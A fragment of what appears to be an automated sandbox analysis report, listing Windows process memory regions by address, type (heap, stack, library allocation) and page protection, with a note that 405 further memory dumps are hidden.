page read and write
|
||
|
23F12FE000
|
stack
|
page read and write
|
||
|
1C46DA40000
|
heap
|
page read and write
|
||
|
1C465633000
|
trusted library allocation
|
page read and write
|
||
|
1C455150000
|
heap
|
page read and write
|
||
|
1C455530000
|
trusted library allocation
|
page read and write
|
||
|
11A9AD60000
|
heap
|
page read and write
|
||
|
1F48D31B000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE00000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DF30000
|
trusted library allocation
|
page read and write
|
||
|
11A9C6ED000
|
heap
|
page read and write
|
||
|
11A9CC51000
|
heap
|
page read and write
|
||
|
7FFE7DE40000
|
trusted library allocation
|
page read and write
|
||
|
11A9C777000
|
heap
|
page read and write
|
||
|
1F48B343000
|
heap
|
page read and write
|
||
|
7FFE7DD00000
|
trusted library allocation
|
page read and write
|
||
|
11A9C712000
|
heap
|
page read and write
|
||
|
11A9C7AC000
|
heap
|
page read and write
|
||
|
1F4A538C000
|
heap
|
page read and write
|
||
|
7FFE7DC1C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C46DAC1000
|
heap
|
page read and write
|
||
|
1F48B353000
|
heap
|
page read and write
|
||
|
7FFE7DCA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C453838000
|
heap
|
page read and write
|
||
|
11A9C725000
|
heap
|
page read and write
|
||
|
7FFE7DD90000
|
trusted library allocation
|
page read and write
|
||
|
2B2E5FF000
|
stack
|
page read and write
|
||
|
1C4559C0000
|
trusted library allocation
|
page read and write
|
||
|
11A9C7AC000
|
heap
|
page read and write
|
||
|
1F48D330000
|
trusted library allocation
|
page read and write
|
||
|
1F48B300000
|
heap
|
page read and write
|
||
|
11A9C77C000
|
heap
|
page read and write
|
||
|
7FFE7DDF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE30000
|
trusted library allocation
|
page read and write
|
||
|
23F127E000
|
stack
|
page read and write
|
||
|
1F48D2EB000
|
trusted library allocation
|
page read and write
|
||
|
1F48B470000
|
heap
|
page readonly
|
||
|
11A9ADB0000
|
heap
|
page read and write
|
||
|
11A9CC45000
|
heap
|
page read and write
|
||
|
11A9C752000
|
heap
|
page read and write
|
||
|
11A9C6E4000
|
heap
|
page read and write
|
||
|
1F48D3F5000
|
trusted library allocation
|
page read and write
|
||
|
23F163E000
|
stack
|
page read and write
|
||
|
23F17BC000
|
stack
|
page read and write
|
||
|
7FFE7DB84000
|
trusted library allocation
|
page read and write
|
||
|
1C456735000
|
trusted library allocation
|
page read and write
|
||
|
2B2E8BF000
|
stack
|
page read and write
|
||
|
10754FE000
|
stack
|
page read and write
|
||
|
1F48D8D2000
|
trusted library allocation
|
page read and write
|
||
|
1C4555C1000
|
trusted library allocation
|
page read and write
|
||
|
11A9ADA3000
|
heap
|
page read and write
|
||
|
1C455640000
|
trusted library allocation
|
page read and write
|
||
|
1F48D797000
|
trusted library allocation
|
page read and write
|
||
|
23F0DCE000
|
stack
|
page read and write
|
||
|
1C46DB0D000
|
heap
|
page read and write
|
||
|
7FFE7DB9B000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD62000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F48D2C0000
|
heap
|
page execute and read and write
|
||
|
11A9C7AE000
|
heap
|
page read and write
|
There are 405 hidden memdumps, click here to show them.